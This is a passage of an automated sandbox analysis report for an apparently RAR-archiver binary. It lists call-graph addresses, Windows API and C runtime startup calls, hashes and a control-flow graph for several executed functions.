39372->39373 39374 7ff64fe74574 39373->39374 39384 7ff64fe746ec 39373->39384 39374->39348 39377 7ff64fe7458d FindClose 39377->39374 39378->39356 39379->39347 39380->39344 39381->39353 39382->39347 39383->39347 39385 7ff64fe74705 pre_c_initialization 39384->39385 39386 7ff64fe747a4 FindNextFileW 39385->39386 39387 7ff64fe74733 FindFirstFileW 39385->39387 39389 7ff64fe747ae GetLastError 39386->39389 39396 7ff64fe7478b 39386->39396 39388 7ff64fe74749 39387->39388 39387->39396 39390 7ff64fe84534 10 API calls 39388->39390 39389->39396 39391 7ff64fe7475b 39390->39391 39393 7ff64fe7477a GetLastError 39391->39393 39394 7ff64fe7475f FindFirstFileW 39391->39394 39392 7ff64feaa610 _handle_error 8 API calls 39395 7ff64fe74587 39392->39395 39393->39396 39394->39393 39394->39396 39395->39374 39395->39377 39396->39392 39397->39293 39398->39294 39401 7ff64fe83626 pre_c_initialization wcschr 39399->39401 39400 7ff64feaa610 _handle_error 8 API calls 39402 7ff64fe557e1 39400->39402 39401->39400 39402->39306 39402->39308 39403->39307 39405 7ff64fe68919 39404->39405 39430 7ff64fe94b14 39405->39430 39407 7ff64fe68954 __scrt_fastfail 39407->39219 39409 7ff64fe89199 39408->39409 39410 7ff64feaa480 4 API calls 39409->39410 39411 7ff64fe891be 39410->39411 39412 7ff64feaa444 new 4 API calls 39411->39412 39413 7ff64fe891cf 39412->39413 39414 7ff64fe891e1 39413->39414 39415 7ff64fe688dc 8 API calls 39413->39415 39416 7ff64feaa444 new 4 API calls 39414->39416 39415->39414 39417 7ff64fe891f7 39416->39417 39418 7ff64fe688dc 8 API calls 39417->39418 39419 7ff64fe89209 39417->39419 39418->39419 39419->39221 39421 7ff64fe688dc 8 API calls 39420->39421 39422 7ff64fe87063 39421->39422 39423 7ff64fe872c0 4 API calls 39422->39423 39424 7ff64fe57325 39423->39424 39424->39224 39424->39226 39435 7ff64fe97d80 39425->39435 39431 7ff64fe94b26 39430->39431 39432 7ff64fe94b2b 39430->39432 39434 7ff64fe94b38 8 API calls _handle_error 39431->39434 39432->39407 39434->39432 39442 7ff64fe98094 39435->39442 39438 7ff64fe78a44 39439 7ff64fe78a5a __scrt_fastfail 39438->39439 39446 7ff64fe9bac4 39439->39446 39443 7ff64fe9809f 39442->39443 39444 7ff64fe97ec8 68 API calls 39443->39444 39445 7ff64fe7896e 39444->39445 39445->39438 39449 7ff64fe9ba70 GetCurrentProcess GetProcessAffinityMask 39446->39449 39450 7ff64fe789c5 39449->39450 39450->39226 39452 7ff64fe89245 39451->39452 39459 7ff64fe76194 72 API calls 39452->39459 39454 7ff64fe892b1 39460 7ff64fe76194 72 API calls 39454->39460 39456 7ff64fe892bd 39461 7ff64fe76194 72 API calls 39456->39461 39458 7ff64fe892c9 39459->39454 39460->39456 39461->39458 39462->39237 39463->39241 39464->39244 39465->39247 39466->39235 39467->39239 39468->39236 39469->39251 39470 7ff64feb231c 39471 7ff64feb2342 GetModuleHandleW 39470->39471 39472 7ff64feb238c 39470->39472 39471->39472 39473 7ff64feb234f 39471->39473 39483 7ff64feb6938 EnterCriticalSection 39472->39483 39473->39472 39484 7ff64feb24d4 GetModuleHandleExW 39473->39484 39475 7ff64feb6998 abort LeaveCriticalSection 39476 7ff64feb2460 39475->39476 39479 7ff64feb2488 11 API calls 39476->39479 39482 7ff64feb246c 39476->39482 39477 7ff64feb2396 39478 7ff64feb2410 39477->39478 39480 7ff64feb43b8 16 API calls 39477->39480 39478->39475 39479->39482 39480->39478 39485 7ff64feb24fe GetProcAddress 39484->39485 39486 7ff64feb2525 39484->39486 39485->39486 39489 7ff64feb2518 39485->39489 39487 7ff64feb252f FreeLibrary 39486->39487 39488 7ff64feb2535 39486->39488 39487->39488 39488->39472 39489->39486 39490 7ff64feab0fc 39509 7ff64feaaa8c 39490->39509 39494 7ff64feab123 __scrt_acquire_startup_lock 39495 7ff64feab148 39494->39495 39565 7ff64feab52c 7 API calls __scrt_fastfail 39494->39565 39499 7ff64feab169 __scrt_is_nonwritable_in_current_image __scrt_release_startup_lock 39495->39499 39517 7ff64feb472c 39495->39517 39498 7ff64feab16d 39499->39498 39500 7ff64feab1f7 39499->39500 39566 7ff64feb2574 35 API calls FindHandlerForForeignException 39499->39566 39521 7ff64feb3fc4 39500->39521 39507 7ff64feab220 39567 7ff64feaac64 8 API calls 2 library calls 39507->39567 39510 7ff64feaaaae __isa_available_init 39509->39510 39568 7ff64feae2f8 39510->39568 39516 7ff64feaaab7 39516->39494 39564 7ff64feab52c 7 API calls __scrt_fastfail 39516->39564 39519 7ff64feb4744 39517->39519 39518 7ff64feb4766 39518->39499 39519->39518 39617 7ff64feab010 39519->39617 39522 7ff64feb3fd4 39521->39522 39524 7ff64feab20c 39521->39524 39702 7ff64feb3c84 39522->39702 39525 7ff64fe87e20 39524->39525 39734 7ff64fe9b470 GetModuleHandleW 39525->39734 39531 7ff64fe87e58 SetErrorMode GetModuleHandleW 39532 7ff64fe948cc 21 API calls 39531->39532 39533 7ff64fe87e7d 39532->39533 39534 7ff64fe93e48 137 API calls 39533->39534 39535 7ff64fe87e90 39534->39535 39536 7ff64fe63d3c 126 API calls 39535->39536 39537 7ff64fe87e9c 39536->39537 39538 7ff64feaa444 new RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 39537->39538 39539 7ff64fe87ead 39538->39539 39540 7ff64fe87ebf 39539->39540 39541 7ff64fe63f18 70 API calls 39539->39541 39542 7ff64fe64d1c 157 API calls 39540->39542 39541->39540 39543 7ff64fe87ed6 39542->39543 39544 7ff64fe87eef 39543->39544 39545 7ff64fe66ad0 154 API calls 39543->39545 39546 7ff64fe64d1c 157 API calls 39544->39546 39547 7ff64fe87ee7 39545->39547 39548 7ff64fe87eff 39546->39548 39549 7ff64fe64e48 160 API calls 39547->39549 39550 7ff64fe87f0d 39548->39550 39552 7ff64fe87f14 39548->39552 39549->39544 39551 7ff64fe9b650 CreateEventW CloseHandle CreateEventW GetLastError CloseHandle 39550->39551 39551->39552 39553 7ff64fe64888 58 API calls 39552->39553 39554 7ff64fe87f57 39553->39554 39555 7ff64fe64fd0 268 API calls 39554->39555 39556 7ff64fe87f5f 39555->39556 39557 7ff64fe87f9e 39556->39557 39558 7ff64fe87f8c 39556->39558 39562 7ff64feab684 GetModuleHandleW 39557->39562 39559 7ff64fe9b650 CreateEventW CloseHandle CreateEventW GetLastError CloseHandle 39558->39559 39560 7ff64fe87f93 39559->39560 39560->39557 39561 7ff64fe9b57c 14 API calls 39560->39561 39561->39557 39563 7ff64feab698 39562->39563 39563->39507 39564->39494 39565->39495 39566->39500 39567->39498 39569 7ff64feae301 __vcrt_initialize_pure_virtual_call_handler __vcrt_initialize_winapi_thunks 39568->39569 39581 7ff64feaeb08 39569->39581 39572 7ff64feaaab3 39572->39516 39576 7ff64feb45e4 39572->39576 39574 7ff64feae318 39574->39572 39588 7ff64feaeb50 DeleteCriticalSection 39574->39588 39577 7ff64feb9d4c 39576->39577 39578 7ff64feaaac0 39577->39578 39605 7ff64feb66c0 39577->39605 39578->39516 39580 7ff64feae32c 8 API calls 3 library calls 39578->39580 39580->39516 39582 7ff64feaeb10 39581->39582 39584 7ff64feaeb41 39582->39584 39585 7ff64feae30b 39582->39585 39589 7ff64feae678 39582->39589 39594 7ff64feaeb50 DeleteCriticalSection 39584->39594 39585->39572 39587 7ff64feae8a4 8 API calls 3 library calls 39585->39587 39587->39574 39588->39572 39595 7ff64feae34c 39589->39595 39592 7ff64feae6cf InitializeCriticalSectionAndSpinCount 39593 7ff64feae6bb 39592->39593 39593->39582 39594->39585 39596 7ff64feae3b2 39595->39596 39597 7ff64feae3ad 39595->39597 39596->39592 39596->39593 39597->39596 39598 7ff64feae3e5 LoadLibraryExW 39597->39598 39603 7ff64feae47a 39597->39603 39604 7ff64feae458 FreeLibrary 39597->39604 39598->39597 39600 7ff64feae40b GetLastError 39598->39600 39599 7ff64feae489 GetProcAddress 39599->39596 39601 7ff64feae4a1 39599->39601 39600->39597 39602 7ff64feae416 LoadLibraryExW 39600->39602 39601->39596 39602->39597 39603->39596 39603->39599 39604->39597 39616 7ff64feb6938 EnterCriticalSection 39605->39616 39607 7ff64feb66d0 39608 7ff64feb8050 32 API calls 39607->39608 39609 7ff64feb66d9 39608->39609 39611 7ff64feb64d0 34 API calls 39609->39611 39615 7ff64feb66e7 39609->39615 39610 7ff64feb6998 abort LeaveCriticalSection 39613 7ff64feb66f3 39610->39613 39612 7ff64feb66e2 39611->39612 39614 7ff64feb65bc GetStdHandle GetFileType 39612->39614 39613->39577 39614->39615 39615->39610 39618 7ff64feab020 pre_c_initialization 39617->39618 39638 7ff64feb2b00 39618->39638 39620 7ff64feab02c pre_c_initialization 39644 7ff64feaaad8 39620->39644 39622 7ff64feab045 39623 7ff64feab0b5 39622->39623 39624 7ff64feab049 _RTC_Initialize 39622->39624 39681 7ff64feab52c 7 API calls __scrt_fastfail 39623->39681 39649 7ff64feaace0 39624->39649 39626 7ff64feab0bf 39682 7ff64feab52c 7 API calls __scrt_fastfail 39626->39682 39629 7ff64feab05a pre_c_initialization 39652 7ff64feb3b0c 39629->39652 39630 7ff64feab0ca __scrt_initialize_default_local_stdio_options 39630->39519 39633 7ff64feab06a 39680 7ff64feab7dc RtlInitializeSListHead 39633->39680 39635 7ff64feab06f pre_c_initialization __InternalCxxFrameHandler 39636 7ff64feb4818 pre_c_initialization 35 API calls 39635->39636 39637 7ff64feab09a pre_c_initialization 39636->39637 39637->39519 39639 7ff64feb2b11 39638->39639 39640 7ff64feb2b19 39639->39640 39683 7ff64feb4f3c 15 API calls _invalid_parameter_noinfo 39639->39683 39640->39620 39642 7ff64feb2b28 39684 7ff64feb4e1c 31 API calls _invalid_parameter_noinfo 39642->39684 39645 7ff64feaab96 39644->39645 39648 7ff64feaaaf0 __scrt_initialize_onexit_tables __scrt_acquire_startup_lock 39644->39648 39685 7ff64feab52c 7 API calls __scrt_fastfail 39645->39685 39647 7ff64feaaba0 39648->39622 39686 7ff64feaac90 39649->39686 39651 7ff64feaace9 39651->39629 39653 7ff64feb3b40 39652->39653 39654 7ff64feb3b2a 39652->39654 39693 7ff64feb9370 39653->39693 39691 7ff64feb4f3c 15 API calls _invalid_parameter_noinfo 39654->39691 39657 7ff64feb3b2f 39692 7ff64feb4e1c 31 API calls _invalid_parameter_noinfo 39657->39692 39659 7ff64feb3b72 39697 7ff64feb38ec 35 API calls pre_c_initialization 39659->39697 39661 7ff64feab066 39661->39626 39661->39633 39663 7ff64feb3b9c 39698 7ff64feb3aa8 15 API calls 2 library calls 39663->39698 39665 7ff64feb3bb2 39666 7ff64feb3bba 39665->39666 39667 7ff64feb3bcb 39665->39667 39699 7ff64feb4f3c 15 API calls _invalid_parameter_noinfo 39666->39699 39700 7ff64feb38ec 35 API calls pre_c_initialization 39667->39700 39670 7ff64feb3be7 39672 7ff64feb3c30 39670->39672 39673 7ff64feb3c17 39670->39673 39678 7ff64feb3bbf 39670->39678 39671 7ff64feb4a74 __free_lconv_num 15 API calls 39671->39661 39676 7ff64feb4a74 __free_lconv_num 15 API calls 39672->39676 39674 7ff64feb4a74 __free_lconv_num 15 API calls 39673->39674 39675 7ff64feb3c20 39674->39675 39677 7ff64feb4a74 __free_lconv_num 15 API calls 39675->39677 39676->39678 39679 7ff64feb3c2c 39677->39679 39678->39671 39679->39661 39681->39626 39682->39630 39683->39642 39684->39640 39685->39647 39687 7ff64feaacbf 39686->39687 39689 7ff64feaacb5 _onexit 39686->39689 39690 7ff64feb4434 34 API calls _onexit 39687->39690 39689->39651 39690->39689 39691->39657 39692->39661 39694 7ff64feb937d 39693->39694 39696 7ff64feb3b45 GetModuleFileNameA 39693->39696 39701 7ff64feb91b0 48 API calls 5 library calls 39694->39701 39696->39659 39697->39663 39698->39665 39699->39678 39700->39670 39701->39696 39703 7ff64feb3ca1 39702->39703 39704 7ff64feb3c98 39702->39704 39703->39524 39704->39703 39708 7ff64feb3ccc 39704->39708 39709 7ff64feb3caa 39708->39709 39710 7ff64feb3ce5 39708->39710 39709->39703 39720 7ff64feb3e78 17 API calls 2 library calls 39709->39720 39711 7ff64feb9370 pre_c_initialization 48 API calls 39710->39711 39712 7ff64feb3cea 39711->39712 39721 7ff64feb978c GetEnvironmentStringsW 39712->39721 39715 7ff64feb3cf7 39717 7ff64feb4a74 __free_lconv_num 15 API calls 39715->39717 39717->39709 39718 7ff64feb3d04 39719 7ff64feb4a74 __free_lconv_num 15 API calls 39718->39719 39719->39715 39720->39703 39722 7ff64feb985e 39721->39722 39723 7ff64feb97ba WideCharToMultiByte 39721->39723 39725 7ff64feb3cef 39722->39725 39726 7ff64feb9868 FreeEnvironmentStringsW 39722->39726 39723->39722 39727 7ff64feb9814 39723->39727 39725->39715 39733 7ff64feb3d38 31 API calls 4 library calls 39725->39733 39726->39725 39728 7ff64feb4ab4 setbuf 16 API calls 39727->39728 39729 7ff64feb981c 39728->39729 39730 7ff64feb9824 WideCharToMultiByte 39729->39730 39731 7ff64feb984b 39729->39731 39730->39731 39732 7ff64feb4a74 __free_lconv_num 15 API calls 39731->39732 39732->39722 39733->39718 39735 7ff64fe9b496 GetProcAddress 39734->39735 39736 7ff64fe87e45 39734->39736 39737 7ff64fe9b4ae 39735->39737 39738 7ff64fe9b4cb GetProcAddress 39735->39738 39739 7ff64fe67a68 39736->39739 39737->39738 39738->39736 39740 7ff64fe67a76 39739->39740 39760 7ff64feb2ae4 39740->39760 39742 7ff64fe67a80 39743 7ff64feb2ae4 setbuf 60 API calls 39742->39743 39744 7ff64fe67a94 39743->39744 39769 7ff64fe67b44 GetStdHandle GetFileType 39744->39769 39747 7ff64fe67b44 3 API calls 39748 7ff64fe67aae 39747->39748 39749 7ff64fe67b44 3 API calls 39748->39749 39751 7ff64fe67abe 39749->39751 39750 7ff64fe67b12 39759 7ff64fe6cd78 SetConsoleCtrlHandler 39750->39759 39752 7ff64fe67aeb 39751->39752 39772 7ff64feb2abc 31 API calls 2 library calls 39751->39772 39752->39750 39774 7ff64feb2abc 31 API calls 2 library calls 39752->39774 39754 7ff64fe67adf 39773 7ff64feb2b40 33 API calls 3 library calls 39754->39773 39757 7ff64fe67b06 39775 7ff64feb2b40 33 API calls 3 library calls 39757->39775 39762 7ff64feb2ae9 39760->39762 39761 7ff64feb7ee8 39776 7ff64feb4f3c 15 API calls _invalid_parameter_noinfo 39761->39776 39762->39761 39765 7ff64feb7f23 39762->39765 39764 7ff64feb7eed 39777 7ff64feb4e1c 31 API calls _invalid_parameter_noinfo 39764->39777 39778 7ff64feb7d98 60 API calls 2 library calls 39765->39778 39768 7ff64feb7ef8 39768->39742 39770 7ff64fe67a9e 39769->39770 39771 7ff64fe67b61 GetConsoleMode 39769->39771 39770->39747 39771->39770 39772->39754 39773->39752 39774->39757 39775->39750 39776->39764 39777->39768 39778->39768 39779 7ff64fe582f0 39780 7ff64fe58306 39779->39780 39791 7ff64fe5836f 39779->39791 39781 7ff64fe58324 39780->39781 39785 7ff64fe58371 39780->39785 39780->39791 39807 7ff64fe72414 61 API calls 39781->39807 39783 7ff64fe58347 39808 7ff64fe71998 138 API calls 39783->39808 39785->39791 39809 7ff64fe71998 138 API calls 39785->39809 39786 7ff64fe5835e 39788 7ff64fe718ac 15 API calls 39786->39788 39788->39791 39790 7ff64fe5b540 147 API calls 39792 7ff64fe5854f 39790->39792 39802 7ff64fe5a410 39791->39802 39793 7ff64fe58578 39792->39793 39795 7ff64fe5b540 147 API calls 39792->39795 39794 7ff64fe5b540 147 API calls 39793->39794 39799 7ff64fe5858f 39794->39799 39795->39793 39796 7ff64fe58634 39797 7ff64feaa610 _handle_error 8 API calls 39796->39797 39798 7ff64fe58663 39797->39798 39799->39796 39810 7ff64fe59628 175 API calls 39799->39810 39811 7ff64fe87a68 39802->39811 39805 7ff64fe5853a 39805->39790 39807->39783 39808->39786 39809->39791 39810->39796 39813 7ff64fe87a8d 39811->39813 39818 7ff64fe5a434 39811->39818 39812 7ff64fe87aaf 39815 7ff64fe722e0 12 API calls 39812->39815 39812->39818 39813->39812 39824 7ff64fe87340 157 API calls 39813->39824 39816 7ff64fe87adf 39815->39816 39817 7ff64fe72440 12 API calls 39816->39817 39817->39818 39818->39805 39819 7ff64fe722e0 39818->39819 39825 7ff64fe720b4 39819->39825 39822 7ff64fe72307 39822->39805 39824->39812 39826 7ff64fe72130 39825->39826 39829 7ff64fe720d0 39825->39829 39826->39822 39830 7ff64fe6cd00 10 API calls 39826->39830 39827 7ff64fe72102 SetFilePointer 39827->39826 39828 7ff64fe72126 GetLastError 39827->39828 39828->39826 39829->39827 39831 7ff64fe53e71 39832 7ff64fe53e81 39831->39832 39834 7ff64fe53e89 39831->39834 39842 7ff64fea9a14 49 API calls 39832->39842 39835 7ff64fe53edd 39834->39835 39836 7ff64fe53ea3 39834->39836 39837 7ff64feaa610 _handle_error 8 API calls 39835->39837 39843 7ff64fe7331c 48 API calls 2 library calls 39836->39843 39839 7ff64fe53eef 39837->39839 39840 7ff64fe53eab 39840->39835 39844 7ff64fe563e8 8 API calls 2 library calls 39840->39844 39842->39834 39843->39840 39844->39835

                                                                                                                                                                                                                                              Executed Functions

                                                                                                                                                                                                                                              Function 00007FF64FE6901C Relevance: 4.5, APIs: 3, Instructions: 35encryptionCOMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000053.00000002.2018601741.00007FF64FE51000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF64FE50000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000053.00000002.2018544373.00007FF64FE50000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000053.00000002.2018718674.00007FF64FEC0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000053.00000002.2018799123.00007FF64FED8000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000053.00000002.2018849155.00007FF64FED9000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000053.00000002.2018892086.00007FF64FEDA000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000053.00000002.2018892086.00007FF64FEE4000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000053.00000002.2018892086.00007FF64FEEE000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000053.00000002.2018892086.00007FF64FEF6000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000053.00000002.2019066736.00007FF64FEF8000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000053.00000002.2019108961.00007FF64FEFE000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_83_2_7ff64fe50000_rar.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Crypt$Context$AcquireRandomRelease
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 1815803762-0
                                                                                                                                                                                                                                              • Opcode ID: a0191cfd7649e62a748f4a6898c5e4dd5358cd018192ea96d54baefd87fc6459
                                                                                                                                                                                                                                              • Instruction ID: 98d8c2e07a39d42b75fd621679c1fde2f95a64d6ab006e371b4c1bb1f168122c
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: a0191cfd7649e62a748f4a6898c5e4dd5358cd018192ea96d54baefd87fc6459
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 99014B26B0C69092FB40AB16A94432D6B62FBC4FD1F5A8431EF4D87B68CE7DD9468700
                                                                                                                                                                                                                                              Function 00007FF64FE7AE10 Relevance: 1.7, APIs: 1, Instructions: 177COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000053.00000002.2018601741.00007FF64FE51000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF64FE50000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000053.00000002.2018544373.00007FF64FE50000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000053.00000002.2018718674.00007FF64FEC0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000053.00000002.2018799123.00007FF64FED8000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000053.00000002.2018849155.00007FF64FED9000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000053.00000002.2018892086.00007FF64FEDA000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000053.00000002.2018892086.00007FF64FEE4000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000053.00000002.2018892086.00007FF64FEEE000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000053.00000002.2018892086.00007FF64FEF6000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000053.00000002.2019066736.00007FF64FEF8000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000053.00000002.2019108961.00007FF64FEFE000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_83_2_7ff64fe50000_rar.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: 57e708d172b4f9bc7610111e00af6b160641e0151f479ce57ca39fdc54f6c8f6
                                                                                                                                                                                                                                              • Instruction ID: ec7fe3c222880d23af7d8d44ffc8802c2a37f7e79474e4188d8231b855ca4124
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 57e708d172b4f9bc7610111e00af6b160641e0151f479ce57ca39fdc54f6c8f6
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: B6719F32A0968596D744FF2AE8052ED33E1FBC8F98F044135DB5D8B399DF78A4518790
                                                                                                                                                                                                                                              Function 00007FF64FE93EA8 Relevance: 25.0, APIs: 3, Strings: 11, Instructions: 491COMMON
                                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                              control_flow_graph 635 7ff64fe93ea8-7ff64fe93f03 call 7ff64feaa5a0 call 7ff64feac8a0 640 7ff64fe93f40-7ff64fe93f50 call 7ff64fe9a9e8 635->640 641 7ff64fe93f05-7ff64fe93f3e GetModuleFileNameW call 7ff64fe84e14 call 7ff64fe9a9c0 635->641 645 7ff64fe93f55-7ff64fe93f79 call 7ff64fe71874 call 7ff64fe71e80 640->645 641->645 652 7ff64fe93f7f-7ff64fe93f89 645->652 653 7ff64fe94692-7ff64fe946c5 call 7ff64fe718ac call 7ff64feaa610 645->653 655 7ff64fe93fae-7ff64fe93feb call 7ff64feaec70 * 2 652->655 656 7ff64fe93f8b-7ff64fe93fac call 7ff64fe911c0 * 2 652->656 668 7ff64fe93fef-7ff64fe93ff3 655->668 656->655 669 7ff64fe940f2-7ff64fe94112 call 7ff64fe722e0 call 7ff64feaeb90 668->669 670 7ff64fe93ff9-7ff64fe9402d call 7ff64fe72440 call 7ff64fe72150 668->670 669->653 681 7ff64fe94118-7ff64fe94131 call 7ff64fe72150 669->681 679 7ff64fe94033 670->679 680 7ff64fe940bc-7ff64fe940e2 call 7ff64fe722e0 670->680 683 7ff64fe9403a-7ff64fe9403e 679->683 680->668 692 7ff64fe940e8-7ff64fe940ec 680->692 689 7ff64fe94133-7ff64fe94136 681->689 690 7ff64fe94138-7ff64fe9414b call 7ff64feaeb90 681->690 686 7ff64fe94040-7ff64fe94044 683->686 687 7ff64fe94064-7ff64fe94069 683->687 686->687 691 7ff64fe94046-7ff64fe9405e call 7ff64feb2290 686->691 693 7ff64fe94097-7ff64fe9409f 687->693 694 7ff64fe9406b-7ff64fe94070 687->694 697 7ff64fe9416f-7ff64fe941b1 call 7ff64fe9a900 call 7ff64feaeb90 689->697 690->653 706 7ff64fe94151-7ff64fe9416c call 7ff64fe9d54c call 7ff64feaeb88 690->706 707 7ff64fe94060 691->707 708 7ff64fe940a3-7ff64fe940a7 691->708 692->653 692->669 695 7ff64fe940a1 693->695 696 7ff64fe940b7 693->696 694->693 700 7ff64fe94072-7ff64fe94078 694->700 695->683 696->680 717 7ff64fe941c0-7ff64fe941d5 697->717 718 7ff64fe941b3-7ff64fe941bb call 7ff64feaeb88 697->718 704 7ff64fe94093 700->704 705 7ff64fe9407a-7ff64fe94091 call 7ff64feb1700 700->705 704->693 705->704 714 7ff64fe940a9-7ff64fe940b5 705->714 706->697 707->687 708->696 714->680 721 7ff64fe945f0-7ff64fe94624 call 7ff64fe93884 call 7ff64feaeb88 * 2 717->721 722 7ff64fe941db 717->722 718->653 756 7ff64fe94626-7ff64fe94648 call 7ff64fe911c0 * 2 721->756 757 7ff64fe9464a-7ff64fe94691 call 7ff64feaec70 * 2 721->757 725 7ff64fe941e1-7ff64fe941ee 722->725 728 7ff64fe941f4-7ff64fe941fa 725->728 729 7ff64fe94508-7ff64fe94513 725->729 732 7ff64fe94208-7ff64fe9420e 728->732 733 7ff64fe941fc-7ff64fe94202 728->733 729->721 731 7ff64fe94519-7ff64fe94523 729->731 735 7ff64fe94585-7ff64fe94589 731->735 736 7ff64fe94525-7ff64fe9452b 731->736 737 7ff64fe943d0-7ff64fe943e0 call 7ff64fe9a580 732->737 738 7ff64fe94214-7ff64fe9425c 732->738 733->729 733->732 739 7ff64fe945a3-7ff64fe945d4 call 7ff64fe93884 735->739 740 7ff64fe9458b-7ff64fe9458f 735->740 742 7ff64fe94531-7ff64fe94539 736->742 743 7ff64fe945db-7ff64fe945de 736->743 762 7ff64fe944f0-7ff64fe94503 737->762 763 7ff64fe943e6-7ff64fe94414 call 7ff64fe9a9e8 call 7ff64feb172c 737->763 744 7ff64fe94261-7ff64fe94264 738->744 739->743 740->739 746 7ff64fe94591-7ff64fe94597 740->746 749 7ff64fe94573-7ff64fe9457a 742->749 750 7ff64fe9453b-7ff64fe9453e 742->750 743->721 751 7ff64fe945e0-7ff64fe945e5 743->751 752 7ff64fe94268-7ff64fe94270 744->752 746->743 755 7ff64fe94599-7ff64fe945a1 746->755 754 7ff64fe9457e-7ff64fe94583 749->754 759 7ff64fe94540-7ff64fe94543 750->759 760 7ff64fe9456a-7ff64fe94571 750->760 751->725 752->752 761 7ff64fe94272-7ff64fe94288 call 7ff64feb1700 752->761 754->743 755->743 756->757 757->653 765 7ff64fe94561-7ff64fe94568 759->765 766 7ff64fe94545-7ff64fe94548 759->766 760->754 780 7ff64fe942a3 761->780 781 7ff64fe9428a-7ff64fe94295 761->781 762->729 763->762 787 7ff64fe9441a-7ff64fe944a9 call 7ff64fe9d840 call 7ff64fe9a900 call 7ff64fe9a8c4 call 7ff64fe9a900 call 7ff64feb15fc 763->787 765->754 771 7ff64fe94558-7ff64fe9455f 766->771 772 7ff64fe9454a-7ff64fe9454d 766->772 771->754 772->746 778 7ff64fe9454f-7ff64fe94556 772->778 778->754 784 7ff64fe942a7-7ff64fe942be 780->784 781->780 782 7ff64fe94297-7ff64fe942a1 781->782 782->784 784->744 788 7ff64fe942c0-7ff64fe942c2 784->788 823 7ff64fe944bf-7ff64fe944cf 787->823 824 7ff64fe944ab-7ff64fe944bb 787->824 790 7ff64fe942c4-7ff64fe942d6 call 7ff64fe9a900 788->790 791 7ff64fe942e6 788->791 796 7ff64fe942db-7ff64fe942e1 790->796 791->737 794 7ff64fe942ec 791->794 797 7ff64fe942f1-7ff64fe942f7 794->797 799 7ff64fe945d6 796->799 800 7ff64fe94300-7ff64fe94303 797->800 801 7ff64fe942f9-7ff64fe942fe 797->801 799->743 800->797 801->800 803 7ff64fe94305-7ff64fe94314 801->803 805 7ff64fe94316-7ff64fe94320 803->805 806 7ff64fe9433d-7ff64fe94347 803->806 810 7ff64fe94323-7ff64fe94327 805->810 807 7ff64fe945ea-7ff64fe945ef call 7ff64feaa774 806->807 808 7ff64fe9434d-7ff64fe94378 call 7ff64fe9d840 806->808 807->721 818 7ff64fe9439e-7ff64fe943cb call 7ff64fe9470c 808->818 819 7ff64fe9437a-7ff64fe94399 call 7ff64feb1764 808->819 810->806 814 7ff64fe94329-7ff64fe9433b 810->814 814->806 814->810 818->796 819->796 827 7ff64fe944d2-7ff64fe944d8 823->827 824->823 828 7ff64fe944da-7ff64fe944e5 827->828 829 7ff64fe944eb-7ff64fe944ee 827->829 828->799 828->829 829->827
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000053.00000002.2018601741.00007FF64FE51000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF64FE50000, based on PE: true
